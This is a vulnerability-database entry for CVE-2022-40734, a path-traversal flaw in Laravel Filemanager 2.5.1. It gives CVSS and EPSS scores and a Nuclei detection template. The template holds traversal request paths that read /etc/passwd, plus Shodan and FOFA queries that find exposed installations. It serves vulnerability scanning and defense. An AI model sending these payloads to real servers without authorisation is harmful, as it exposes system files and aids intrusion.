Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-40734
HistorySep 15, 2022 - 8:44 a.m.

Laravel Filemanager v2.5.1 - Local File Inclusion

2022-09-1508:44:40
ProjectDiscovery
github.com
113
cve
cve2022
laravel
unisharp
lfi
traversal

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.124

Percentile

95.5%

Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.
id: CVE-2022-40734

info:
  name: Laravel Filemanager v2.5.1 - Local File Inclusion
  author: arafatansari
  severity: medium
  description: |
    Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.
  remediation: |
    Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor.
  reference:
    - https://github.com/UniSharp/laravel-filemanager/issues/1150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
    - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966
    - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-40734
    cwe-id: CWE-22
    epss-score: 0.10627
    epss-percentile: 0.95035
    cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: unisharp
    product: laravel_filemanager
    shodan-query:
      - http.html:"Laravel Filemanager"
      - http.html:"laravel filemanager"
    fofa-query: body="laravel filemanager"
  tags: cve,cve2022,laravel,unisharp,lfi,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
# digest: 4b0a00483046022100d204c770b198c4635b4fbc52cf8a047c87b2cfbc536ce46b75e6d1af120ac599022100c25485435188c000143e079c811d4e3daa086c5508e24077e055c1a887e65050:922c64590222798bb761d5b6d8e72950

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.124

Percentile

95.5%